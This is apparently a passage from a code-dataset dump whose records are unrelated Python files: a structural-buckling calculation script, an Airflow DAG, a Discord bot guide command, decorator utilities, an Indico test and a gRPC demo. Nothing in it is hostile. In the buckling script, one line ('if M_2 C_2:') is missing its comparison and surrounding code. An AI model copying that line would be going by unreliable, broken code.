"sub_path": "rocon_python_comms/src/rocon_python_comms/service_pair_client.py", "file_name": "service_pair_client.py", "file_ext": "py", "file_size_in_byte": 10015, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "threading.Event", "line_number": 35, "usage_type": "call"}, {"api_name": "exceptions.ServicePairException", "line_number": 94, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 95, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 96, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 97, "usage_type": "call"}, {"api_name": "time.time", "line_number": 110, "usage_type": "call"}, {"api_name": "rospy.is_shutdown", "line_number": 111, "usage_type": "call"}, {"api_name": "time.time", "line_number": 111, "usage_type": "call"}, {"api_name": "rospy.rostime.wallsleep", "line_number": 114, "usage_type": "call"}, {"api_name": "rospy.rostime", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rospy.is_shutdown", "line_number": 115, "usage_type": "call"}, {"api_name": "rospy.ROSInterruptException", "line_number": 116, "usage_type": "call"}, {"api_name": "rospy.ROSException", "line_number": 118, "usage_type": "call"}, {"api_name": "unique_id.toMsg", "line_number": 142, "usage_type": "call"}, {"api_name": "unique_id.fromRandom", "line_number": 142, "usage_type": "call"}, {"api_name": "unique_id.toHexString", "line_number": 144, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 189, "usage_type": "call"}, {"api_name": "rospy.Timer", "line_number": 190, "usage_type": "call"}, {"api_name": "unique_id.toMsg", "line_number": 213, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 213, "usage_type": "call"}, {"api_name": "unique_id.toHexString", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "262773503", "text": "import math\nimport numpy as np\nfrom scipy import linalg\nfrom channel import channel\nfrom I_beam import I_beam\nfrom RHS import RHS\nfrom stress_from_strain import stress_from_strain\nfrom get_data import get_data\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd \nfrom finite_strip_moment import finitestrip_shape\nimport os\nimport xlrd\nfrom xlutils.copy import copy\nfrom xlwt import Workbook\n\n#cd c:/Users/saulg/Documents/year\\ 4/IIB_Project/code/mycode\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return idx\n\nfactor = 5\n\nlist_M =[]\nlist_C =[]\nlist_stress = []\nlist_stress_c = []\nlist_Et= []\nlist_Et_c= []\nlist_type = []\n\nfor data_point in range(100,196):\n Material, Forming_process, Bending_type, Actual_Length, shape, Material_flat, Material_corner = get_data(data_point)\n if Bending_type == 4:\n \"\"\"print(Material)\n print(Forming_process)\n print(Bending_type)\n print(shape)\n print(Actual_Length)\n print(Material_flat)\n print(Material_corner)\"\"\"\n\n number = 100\n max_L = Actual_Length*5 \n min_L = shape[2]/5\n r = (max_L/min_L) ** (1/(number-1))\n Moment = []\n stress_list = []\n Moment_1 = []\n Curvature_1 = []\n Curvature = []\n Length = []\n Length_factor= True\n tic = time.perf_counter()\n\n for i in range(number):\n L = min_L * r**i\n Length.append(L)\n if i == 0:\n A_initial = 0.00001\n elif i == 1:\n A_initial = A\n A_2 = A\n elif i == 2:\n A_initial = abs(2 * A - A_2)\n A_3 = A_2\n A_2 = A\n else:\n A_initial = abs(3 * A - 3 * A_2 + A_3)\n A_3 = A_2\n A_2 = A\n\n M, A, max_stress = finitestrip_shape(L, shape, Material_flat, Material_corner, A_initial)\n C=A\n if M ==\"Fail\":\n Length.pop()\n break\n if Length_factor:\n Moment_1.append(M)\n Curvature_1.append(M)\n \n for num in range(2,round(factor*L/(shape[2]))):\n M_2 = Moment[find_nearest(Length, L/num)]\n C_2 = Curvature[find_nearest(Length, L/num)]\n if M > M_2:\n M = M_2\n max_stress = stress_list[find_nearest(Length, L/num)]\n if C > C_2:\n C = C_2\n \n Moment.append(M)#\n Curvature.append(C)\n stress_list.append(max_stress)\n toc = time.perf_counter()\n print(f\"Done in {toc - tic:0.4f} seconds\")\n typ = \"Flexural\"\n M, A, max_stress= finitestrip_shape(Actual_Length, shape, Material_flat, Material_corner, A_initial)\n C=A\n if Length_factor and M !=\"Fail\":\n for num in range(2,round(factor*Actual_Length/(shape[2]))):\n\n M_2 = Moment[find_nearest(Length, Actual_Length/num)]\n C_2 = Curvature[find_nearest(Length, Actual_Length/num)]\n if M_2 C_2:\n C = C_2\n print(data_point, Actual_Length,M,C, max_stress)\n list_M.append(M)\n list_C.append(C)\n list_stress.append(max_stress[0][0])\n list_stress_c.append(max_stress[1][0])\n list_Et.append(max_stress[0][1])\n list_Et_c.append(max_stress[1][1])\n list_type.append(typ)\n\n plt.semilogx([Actual_Length], [M],'rx')\n if Length_factor:\n plt.semilogx(Length, Moment_1, linewidth = 0.4, color = \"black\", label='Singe Half Wavelength')\n plt.semilogx(Length, Moment, linewidth = 1.2, color = \"black\", label='Multiple Half Wavelengths')\n else:\n plt.semilogx(Length, Moment, linewidth = 1.4, color = \"black\")\n\n #plt.semilogx([1000], [151], 'rx', label='Buckling')\n #plt.semilogx([1000], [169], 'bx', label='Failure')\n\n plt.xlabel('L / mm')\n plt.ylabel('Buckling Moment / KNm')\n plt.grid(True,'both')\n plt.title(data_point)\n plt.legend()\n #plt.show()\n else:\n list_M.append(\"\")\n list_C.append(\"\")\n list_stress.append(\"\")\n list_stress_c.append(\"\")\n list_Et.append(\"\")\n list_Et_c.append(\"\")\n list_type.append(\"\")\nprint(\"M\")\nfor n in list_M:\n print(n)\nprint(\"list_C\")\nfor n in list_C:\n print(n)\nprint(\"list_stress\")\nfor n in list_stress:\n print(n)\nprint(\"list_stress_c\")\nfor n in list_stress_c:\n print(n)\nprint(\"list_Et\")\nfor n in list_Et:\n print(n)\nprint(\"list_Et_c\")\nfor n in list_Et_c:\n print(n)\nprint(\"type\")\nfor n in list_type:\n print(n)\n\n\n\n\n\n\n\"\"\"\nprint(finitestrip_shape(L = 1000, shape = \"channel\", b = 138.60, d = 202.05, r = 5, t_flange = 6.11, t_web = 6.01, c = 23, Eel = 195000, spr = 520, n = 7.5, v = 0.3, k = -0.46))\n\nx1=[]\ny1=[]\n\nfor f in file:\n x1.append(f[0])\n y1.append(f[1])\nplt.semilogx(x1, y1, linewidth = 0.4, color = \"red\", label='CUFSM')\"\"\"", "sub_path": "finite_strip_moment_curve.py", "file_name": "finite_strip_moment_curve.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.asarray", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 23, "usage_type": "call"}, {"api_name": "get_data.get_data", "line_number": 37, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 58, "usage_type": "call"}, {"api_name": "finite_strip_moment.finitestrip_shape", "line_number": 77, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 98, "usage_type": "call"}, {"api_name": "finite_strip_moment.finitestrip_shape", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogx", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}]}
+{"seq_id": "636819995", "text": "from datetime import datetime\n\nimport pendulum\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\n\ndefault_args = {\n 'owner': 'hungvv1',\n 'email': ['vuviethung.98.hust@gmail.com'],\n 'email_on_failure': True,\n 'email_on_retry': True\n}\n\ndag = DAG('project_analytics_monthly',\n default_args=default_args,\n description='Các jobs chạy phân tích dự án theo tháng',\n schedule_interval='@once',\n start_date=datetime(2018, 1, 1, tzinfo=pendulum.timezone('Asia/Ho_Chi_Minh')),\n catchup=False\n )\n\nt1 = BashOperator(\n task_id=\"project_statistics_monthly\",\n bash_command='/home/vuviethung/code/code/cen_jobs/project_statistics_monthly/run-project-filtering.sh',\n dag=dag,\n queue='worker_2'\n)\n", "sub_path": "dags/g_filtering_project_dags.py", "file_name": "g_filtering_project_dags.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "airflow.DAG", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "call"}, {"api_name": "pendulum.timezone", "line_number": 18, "usage_type": "call"}, {"api_name": "airflow.operators.bash_operator.BashOperator", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "346370443", "text": "import discord \r\nimport asyncio\r\nimport random\r\nfrom discord.ext import commands\r\nimport os\r\nimport datetime\r\nimport pymongo\r\nimport json\r\nimport math\r\nm=None\r\ndb_client=pymongo.MongoClient(os.getenv(\"DB_URL\"))\r\ndb1_client=pymongo.MongoClient(os.getenv(\"DB2_URL\"))\r\n\r\nclass guide(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n @commands.command()\r\n @commands.guild_only()\r\n async def guide(self,ctx,number=None):\r\n if number==None:\r\n number=1\r\n number=int(number)-1\r\n #registration\r\n list_of_pages=[]\r\n embed=discord.Embed(title=\"Guide\",description=\"**Registration**\\n\\nIn order to use some features of the bot or challenge others, you need to have an account on your name. You can create an account by using `c!register` command.\\nAfter creating an account you can check your profile using `c!profile` command.\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/register-pic.png\")\r\n embed.set_footer(text=\"Page : 1/8\")\r\n list_of_pages.append(embed)\r\n #challenge\r\n embed=discord.Embed(title=\"Guide\",description=\"**Challenge**\\n\\nAfter you are done with creating your account you can now use all the bot's commands and play with it.\\nTo play with the other person, either you need to challenge them or they need to challenge you which you can do by using `c!challenge` command tagging the opponent.\\nAfter you throw a challenge, the opponent can accept it using `c!accept` or decline it using `c!decline` command.\")\r\n embed.set_footer(text=\"Page : 2/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/Challenge-pic.png\")\r\n list_of_pages.append(embed)\r\n #select_team\r\n embed=discord.Embed(title=\"Guide\",description=\"**Selecting team**\\n\\nAfter the opponent accepts the challenge, the bot will prompt you to select a team from default teams.\\nYou can check the available leagues by typing `c!leagues`. After checking the available leagues, you can select a league from it by using `c!st league_id`, here league id is the id given by the respective league.\\nAfter selecting the league, the bot will prompt you to select a team which you can do by using `c!select_team `.\")\r\n embed.set_footer(text=\"Page : 3/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/select-team-pic.png\")\r\n list_of_pages.append(embed)\r\n #set_overs\r\n embed=discord.Embed(title=\"Guide\",description=\"**Setting overs**\\n\\nAfter you are done with choosing your team, you need to set the overs of the match. This can be done using `c!so` command.\")\r\n embed.set_footer(text=\"Page : 4/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/set-overs-pic.png\")\r\n list_of_pages.append(embed)\r\n #toss\r\n embed=discord.Embed(title=\"Guide\",description=\"**Toss**\\n\\nSimilar to the real life cricket game, the teams have to choose what they gonna do first. This can be done by doing toss. Toss can be done using `c!toss` command.\\nAfter one of the players type the command, the opponent needs to send his choice in the chat i.e., heads/tails.\")\r\n embed.set_footer(text=\"Page : 5/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/toss-pic.png\")\r\n list_of_pages.append(embed)\r\n #choose\r\n embed=discord.Embed(title=\"Guide\",description=\"**Choosing**\\n\\nAfter the toss, the toss-winner should choose either bowling or batting by using `c!choose` command.\")\r\n embed.set_footer(text=\"Page : 6/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/choose-pic.png\")\r\n list_of_pages.append(embed)\r\n #select_player\r\n embed=discord.Embed(title=\"Guide\",description=\"**Selecting players**\\n\\nAfter choosing either batting or bowling, the teams can choose their players by using `c!sp` command.\")\r\n embed.set_footer(text=\"Page : 7/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/select-player-pic.png\")\r\n list_of_pages.append(embed)\r\n #bowl\r\n embed=discord.Embed(title=\"Guide\",description=\"**Selecting players**\\n\\nAfter choosing your players, now you are all set to play the match. The bowling team needs to use the `c!bowl` command and the batting team needs to wait patiently for their turn to come :wink:.\")\r\n embed.set_footer(text=\"Page : 8/8\")\r\n embed.set_image(url=\"https://raw.githubusercontent.com/Shrikar-Kota/Personalcrickgame/master/images/bowl-pic.png\")\r\n list_of_pages.append(embed) \r\n global m\r\n m=await ctx.send(embed=list_of_pages[number])\r\n await m.add_reaction(\"⬅️\")\r\n await m.add_reaction(\"➡️\")\t\r\n def check(reaction, user):\r\n return (user.id==ctx.message.author.id and m.id==reaction.message.id)\r\n while 1:\r\n try:\r\n reaction, user = await self.bot.wait_for('reaction_add', timeout=30.0, check=check)\r\n except asyncio.TimeoutError:\r\n return \r\n else:\r\n m = await ctx.channel.fetch_message(m.id)\r\n if str(reaction.emoji)==\"➡️\":\r\n e=m.embeds\r\n e=str(e[0].footer.text)\r\n e=e.split(\":\")\r\n e=e[1].split(\"/\")\r\n count=int(e[0])\r\n if count>len(list_of_pages)-1:\r\n count=0\r\n await m.edit(embed=list_of_pages[count])\r\n await m.remove_reaction(\"➡️\",user)\r\n elif str(reaction.emoji)==\"⬅️\":\r\n e=m.embeds\r\n e=str(e[0].footer.text)\r\n e=e.split(\":\")\r\n e=e[1].split(\"/\")\r\n count=int(e[0])-2\r\n if count==-1:\r\n count=len(list_of_pages)-1\r\n await m.edit(embed=list_of_pages[count])\r\n await m.remove_reaction(\"⬅️\",user)\r\n else:\r\n await m.remove_reaction(str(reaction.emoji),user)\r\n\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(guide(bot))\r\n", "sub_path": "cogs/guide.py", "file_name": "guide.py", "file_ext": "py", "file_size_in_byte": 6492, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pymongo.MongoClient", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 14, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 40, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 45, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 50, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 55, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 60, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 17, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 17, "usage_type": "name"}, {"api_name": "discord.ext.commands.guild_only", "line_number": 18, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "401691712", "text": "import contextlib\nfrom functools import wraps\n\n\nclass cached_property(object):\n \"\"\"\n Property which caches the result of the given `getter`.\n\n :param doc: Optional docstring which is used instead of the `getter`\\s\n docstring.\n \"\"\"\n def __init__(self, getter, doc=None):\n self.getter = getter\n self.__module__ = getter.__module__\n self.__name__ = getter.__name__\n self.__doc__ = doc or getter.__doc__\n\n def __get__(self, obj, type=None):\n if type is None:\n return self\n value = obj.__dict__[self.__name__] = self.getter(obj)\n return value\n\n\ndef service(func):\n func.__transactional__ = True\n return func\n\n\ndef _transactional(session_provider):\n def wrap_function(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n session = session_provider()\n try:\n ret = func(*args, **kwargs)\n session.commit()\n return ret\n except:\n session.rollback()\n raise\n return wrapper\n return wrap_function\n\n\ndef transactional(instance, session_provider):\n for key in dir(instance):\n func = getattr(instance, key)\n\n if callable(func) and getattr(func, '__transactional__', False):\n setattr(instance, key, wraps(func)(_transactional(session_provider)(func)))\n return instance", "sub_path": "tomasd/src/rsmt/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "functools.wraps", "line_number": 32, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "130933153", "text": "# This file is part of Indico.\n# Copyright (C) 2002 - 2023 CERN\n#\n# Indico is free software; you can redistribute it and/or\n# modify it under the terms of the MIT License; see the\n# LICENSE file for more details.\n\nimport pytest\n\nfrom indico.modules.events.contributions.lists import ContributionListGenerator\nfrom indico.modules.events.contributions.models.persons import AuthorType, ContributionPersonLink\nfrom indico.modules.events.models.persons import EventPerson\nfrom indico.modules.events.registration.models.forms import RegistrationForm\nfrom indico.modules.events.registration.models.registrations import Registration, RegistrationState\n\n\n@pytest.fixture\ndef create_registration(dummy_event):\n \"\"\"Return a callable that lets you create a contribution.\"\"\"\n\n def _create_registration(user, regform, **kwargs):\n return Registration(\n first_name='Guinea',\n last_name='Pig',\n checked_in=True,\n state=RegistrationState.complete,\n currency='USD',\n email=user.email,\n user=user,\n registration_form=regform,\n **kwargs\n )\n\n return _create_registration\n\n\ndef test_filter_contrib_entries(app, db, dummy_event, create_user, create_contribution, create_registration):\n registered_user = create_user(1)\n registered_speaker = create_user(2)\n unregistered_user = create_user(3)\n dummy_regform = RegistrationForm(event=dummy_event, title='Registration Form', currency='USD')\n dummy_event.registrations.append(create_registration(registered_user, dummy_regform))\n dummy_event.registrations.append(create_registration(registered_speaker, dummy_regform))\n registered_speaker_contribution = create_contribution(dummy_event, 'Registered Speaker', person_links=[\n ContributionPersonLink(person=EventPerson.create_from_user(registered_speaker, dummy_event),\n is_speaker=True)\n ])\n registered_speaker_author_contribution = create_contribution(\n dummy_event, 'Registered Speaker Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(registered_speaker, dummy_event),\n is_speaker=True, author_type=AuthorType.primary)\n ])\n unregistered_speaker_registered_author_contribution = create_contribution(\n dummy_event, 'Unregistered Speaker, Registered Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(unregistered_user, dummy_event),\n is_speaker=True),\n ContributionPersonLink(person=EventPerson.for_user(registered_user, dummy_event),\n author_type=AuthorType.primary)\n ])\n registered_speaker_unregistered_author_contribution = create_contribution(\n dummy_event, 'Registered Speaker, Unregistered Author', person_links=[\n ContributionPersonLink(person=EventPerson.for_user(registered_user, dummy_event), is_speaker=True),\n ContributionPersonLink(person=EventPerson.for_user(unregistered_user, dummy_event),\n author_type=AuthorType.primary)\n ])\n # Filter contributions with registered users\n with app.test_request_context():\n list_gen = ContributionListGenerator(dummy_event)\n list_gen.list_config['filters'] = {'items': {'people': {'registered'}}}\n result = list_gen.get_list_kwargs()\n assert result['contribs'] == [\n registered_speaker_contribution,\n registered_speaker_author_contribution,\n unregistered_speaker_registered_author_contribution,\n registered_speaker_unregistered_author_contribution\n ]\n\n # Filter contributions with registered speakers\n list_gen.list_config['filters'] = {'items': {'speakers': {'registered'}}}\n with app.test_request_context():\n result = list_gen.get_list_kwargs()\n assert result['contribs'] == [\n registered_speaker_contribution,\n registered_speaker_author_contribution,\n registered_speaker_unregistered_author_contribution\n ]\n\n # Filter contributions with unregistered speakers and registered users\n list_gen.list_config['filters'] = {'items': {'speakers': {'not_registered'}, 'people': {'registered'}}}\n with app.test_request_context():\n result = list_gen.get_list_kwargs()\n assert result['contribs'] == [\n unregistered_speaker_registered_author_contribution\n ]\n", "sub_path": "indico/modules/events/contributions/lists_test.py", "file_name": "lists_test.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "indico.modules.events.registration.models.registrations.Registration", "line_number": 22, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.registrations.RegistrationState.complete", "line_number": 26, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.registrations.RegistrationState", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.forms.RegistrationForm", "line_number": 41, "usage_type": "call"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 45, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.create_from_user", "line_number": 45, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 45, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 50, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 50, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 50, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 51, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 51, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 55, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 55, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 55, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 57, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 57, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 57, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 58, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 58, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 62, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 62, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 62, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.ContributionPersonLink", "line_number": 63, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson.for_user", "line_number": 63, "usage_type": "call"}, {"api_name": "indico.modules.events.models.persons.EventPerson", "line_number": 63, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType.primary", "line_number": 64, "usage_type": "attribute"}, {"api_name": "indico.modules.events.contributions.models.persons.AuthorType", "line_number": 64, "usage_type": "name"}, {"api_name": "indico.modules.events.contributions.lists.ContributionListGenerator", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "1356193", "text": "'''\r\nCreated on 2017年12月28日\r\n\r\n@author: Administrator\r\n'''\r\n\r\nimport os\r\nimport grpc\r\nimport sys\r\nimport getopt\r\nimport time\r\nfrom concurrent import futures\r\nimport cProfile\r\n\r\nroot_path = os.path.dirname(__file__)\r\nsys.path.append('./')\r\nsys.path.append('../')\r\nsys.path.append('../proto')\r\n\r\nimport chat_pb2\r\nimport chat_pb2_grpc\r\n\r\nimport route_database_pb2\r\nimport route_database_pb2_grpc\r\n\r\nimport route_db\r\n\r\n_ONE_DAY_IN_SECONDS = 60 * 1\r\n\r\nclass Calc(chat_pb2_grpc.CalcServicer):\r\n def add(self, request, context):\r\n return chat_pb2.Result(c = request.a + request.b);\r\n \r\n def sub(self, request, context):\r\n return chat_pb2.Result(c = request.a - request.b);\r\n \r\n def mul(self, request, context):\r\n return chat_pb2.Result(c = request.a * request.b);\r\n\r\nclass Greeter(chat_pb2_grpc.GreeterServicer):\r\n\r\n def SayHello(self, request, context):\r\n return chat_pb2.HelloReply(message='Hello, %s!' % request.name)\r\n \r\n\r\nclass Route(route_database_pb2_grpc.RouteGreeterServicer):\r\n \r\n def __init__(self):\r\n # db = cProfile.run('route_db.read_route_database()')\r\n self.db = route_db.read_route_database()\r\n print(self.db)\r\n \r\n def GetFeature(self, request, context):\r\n for feature in self.db:\r\n if feature.location == request:\r\n return feature\r\n return None\r\n \r\n def ListFeatures(self, request, context):\r\n pass\r\n \r\n def RecordRoute(self, request, context):\r\n pass\r\n \r\n def RouteChat(self, request, context):\r\n pass\r\n \r\n \r\ndef client():\r\n channel = grpc.insecure_channel('localhost:50052')\r\n stub = chat_pb2_grpc.GreeterStub(channel)\r\n# routestub = route_database_pb2_grpc.RouteGreeterStub(channel)\r\n calcstub = chat_pb2_grpc.CalcStub(channel)\r\n tm1 = time.time()\r\n \r\n# for i in range(3000):\r\n# t = time.time()\r\n# reponse = stub.SayHello(chat_pb2.HelloRequest(name='liwei'))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n# for _ in range(3000):\r\n# t = time.time()\r\n# reponse = routestub.GetFeature(route_database_pb2.FeatureRequest(route_database_pb2.Point(latitude=408122808, longitude=743999179)))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n for i in range(3000):\r\n# t = time.time()\r\n reponse = calcstub.add(chat_pb2.Value(a=10, b=20))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n# t = time.time()\r\n# reponse = calcstub.sub(chat_pb2.Value(a=10, b=20))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n# \r\n# t = time.time()\r\n# reponse = calcstub.mul(chat_pb2.Value(a=10, b=20))\r\n# print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n tm2 = time.time()\r\n \r\n print('all time: ', tm2-tm1)\r\n \r\ndef server():\r\n srv = grpc.server(futures.ThreadPoolExecutor(max_workers=(8)))\r\n chat_pb2_grpc.add_GreeterServicer_to_server(Greeter(), srv)\r\n chat_pb2_grpc.add_CalcServicer_to_server(Calc(), srv)\r\n# route_database_pb2_grpc.add_RouteGreeterServicer_to_server(Route(), srv)\r\n srv.add_insecure_port('[::]:50052')\r\n srv.start()\r\n\r\n try:\r\n while True:\r\n print('looping')\r\n time.sleep(_ONE_DAY_IN_SECONDS)\r\n except KeyboardInterrupt:\r\n srv.stop(0)\r\n\r\ndef main():\r\n opts, _ = getopt.getopt(sys.argv[1:], 'ht:')\r\n t = ''\r\n for op, v in opts:\r\n if op == '-t':\r\n t = v\r\n\r\n if t == 's':\r\n server()\r\n elif t == 'c':\r\n client()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "python/grpc_demo/server/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "chat_pb2_grpc.CalcServicer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "chat_pb2.Result", "line_number": 32, "usage_type": "call"}, {"api_name": "chat_pb2.Result", "line_number": 35, "usage_type": "call"}, {"api_name": "chat_pb2.Result", "line_number": 38, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.GreeterServicer", "line_number": 40, "usage_type": "attribute"}, {"api_name": "chat_pb2.HelloReply", "line_number": 43, "usage_type": "call"}, {"api_name": "route_database_pb2_grpc.RouteGreeterServicer", "line_number": 46, "usage_type": "attribute"}, {"api_name": "route_db.read_route_database", "line_number": 50, "usage_type": "call"}, {"api_name": "grpc.insecure_channel", "line_number": 70, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.GreeterStub", "line_number": 71, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.CalcStub", "line_number": 73, "usage_type": 